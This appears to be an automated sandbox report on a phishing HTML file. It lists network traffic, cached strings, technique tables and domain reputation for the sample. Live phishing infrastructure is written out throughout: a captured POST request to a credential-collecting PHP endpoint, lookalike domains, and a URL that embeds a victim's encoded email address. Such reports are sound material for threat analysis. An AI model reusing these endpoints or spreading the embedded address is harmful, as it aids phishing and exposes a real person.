                  Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                  Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
                  Source: global trafficDNS traffic detected: DNS query: glansaolksnu.ru
                  Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                  Source: unknownHTTP traffic detected: POST /js/images/tvavx.php HTTP/1.1Host: www.estampariaimagemeacao.com.brConnection: keep-aliveContent-Length: 217Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 18:11:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                  Source: chromecache_110.2.drString found in binary or memory: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2J
                  Source: chromecache_99.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
                  Source: chromecache_99.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                  Source: chromecache_108.2.dr, chromecache_98.2.dr, chromecache_95.2.dr, chromecache_102.2.dr, chromecache_100.2.dr, chromecache_104.2.dr, chromecache_101.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                  Source: chromecache_108.2.dr, chromecache_95.2.dr, chromecache_102.2.dr, chromecache_104.2.dr, chromecache_101.2.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
                  Source: chromecache_99.2.drString found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#about
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#classic-cars
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#contact
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#electric-vehicles
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#faq
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#learn-more
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#modern-supercars
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#privacy
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#services
                  Source: chromecache_99.2.drString found in binary or memory: https://glansaolksnu.ru/#terms
                  Source: chromecache_99.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.5:49760 version: TLS 1.2
                  Source: classification engineClassification label: mal100.phis.evad.winHTM@27/35@30/15
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htm"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2108,i,18282856199490387947,11030613626168180458,262144 /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2108,i,18282856199490387947,11030613626168180458,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
                  Source: Window RecorderWindow detected: More than 3 window changes detected

                  Data Obfuscation

                  barindex
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=HTTP Parser: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#YY2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Scripting
                  1
                  Process Injection
                  1
                  Masquerading
                  OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Registry Run Keys / Startup Folder
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Process Injection
                  LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information
                  Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
                  https://code.jquery.com/jquery-3.5.1.slim.min.js0%URL Reputationsafe
                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js0%URL Reputationsafe
                  https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
                  https://cdn.jsdelivr.net/npm/0%Avira URL Cloudsafe
                  https://glansaolksnu.ru//0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#privacy0%Avira URL Cloudsafe
                  https://www.estampariaimagemeacao.com.br/js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#modern-supercars0%Avira URL Cloudsafe
                  https://glansaolksnu.ru///7627.php0%Avira URL Cloudsafe
                  https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/favicon.ico0%Avira URL Cloudsafe
                  https://challenges.cloudflare.com/turnstile/v0/api.js0%Avira URL Cloudsafe
                  https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/0%Avira URL Cloudsafe
                  https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/,0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#electric-vehicles0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#learn-more0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#faq0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#classic-cars0%Avira URL Cloudsafe
                  file:///C:/Users/user/Desktop/httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htm0%Avira URL Cloudsafe
                  https://www.estampariaimagemeacao.com.br/favicon.ico0%Avira URL Cloudsafe
                  https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#about0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#services0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#contact0%Avira URL Cloudsafe
                  https://glansaolksnu.ru/#terms0%Avira URL Cloudsafe
                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                  172.66.47.111
                  truetrue
                    unknown
                    code.jquery.com
                    151.101.2.137
                    truefalse
                      unknown
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truetrue
                        unknown
                        challenges.cloudflare.com
                        104.18.94.41
                        truefalse
                          unknown
                          www.google.com
                          108.177.122.105
                          truefalse
                            unknown
                            estampariaimagemeacao.com.br
                            45.164.92.188
                            truefalse
                              unknown
                              glansaolksnu.ru
                              104.21.51.138
                              truetrue
                                unknown
                                www.estampariaimagemeacao.com.br
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://glansaolksnu.ru//true
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://glansaolksnu.ru///7627.phptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.estampariaimagemeacao.com.br/js/images/tvavx.phptrue
                                    unknown
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.estampariaimagemeacao.com.br/js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-daubertrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/favicon.icofalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/,false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.estampariaimagemeacao.com.br/favicon.icofalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.jsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    file:///C:/Users/user/Desktop/httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htmtrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://cdn.jsdelivr.net/npm/chromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.jsdelivr.net/npm/bootstrapchromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#modern-supercarschromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://code.jquery.com/jquery-3.5.1.slim.min.jschromecache_99.2.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://glansaolksnu.ru/#privacychromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.jschromecache_99.2.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://glansaolksnu.ru/#electric-vehicleschromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#classic-carschromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#learn-morechromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#chromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#faqchromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#aboutchromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#serviceschromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#contactchromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://glansaolksnu.ru/#termschromecache_99.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.17.24.14
                                    unknownUnited States
                                    13335CLOUDFLARENETUSfalse
                                    104.21.51.138
                                    glansaolksnu.ruUnited States
                                    13335CLOUDFLARENETUStrue
                                    172.66.44.145
                                    unknownUnited States
                                    13335CLOUDFLARENETUSfalse
                                    104.18.94.41
                                    challenges.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    151.101.130.137
                                    unknownUnited States
                                    54113FASTLYUSfalse
                                    172.66.47.111
                                    ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devUnited States
                                    13335CLOUDFLARENETUStrue
                                    151.101.2.137
                                    code.jquery.comUnited States
                                    54113FASTLYUSfalse
                                    239.255.255.250
                                    unknownReserved
                                    unknownunknownfalse
                                    45.164.92.188
                                    estampariaimagemeacao.com.brBrazil
                                    268685DCVSERVICOSDELOCACAODEMAQUINASEEQUIPAMENTOSBRfalse
                                    108.177.122.105
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    104.17.25.14
                                    cdnjs.cloudflare.comUnited States
                                    13335CLOUDFLARENETUStrue
                                    IP
                                    192.168.2.17
                                    192.168.2.8
                                    192.168.2.7
                                    192.168.2.5
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1500044
                                    Start date and time:2024-08-27 20:10:17 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowshtmlcookbook.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:httpsworker-nameless-haze-86e5.berwieberwieberwieberwieberwie.workers.deveba=.htm
                                    Detection:MAL
                                    Classification:mal100.phis.evad.winHTM@27/35@30/15
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .htm
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.186.142, 64.233.184.84, 34.104.35.123, 172.217.16.202, 142.250.185.234, 142.250.185.202, 142.250.181.234, 172.217.18.106, 142.250.185.74, 142.250.184.234, 142.250.185.106, 142.250.74.202, 142.250.184.202, 142.250.186.106, 142.250.185.170, 142.250.186.170, 216.58.206.42, 142.250.185.138, 142.250.186.138, 199.232.210.172, 192.229.221.95, 142.250.185.227, 93.184.221.240, 142.250.186.174
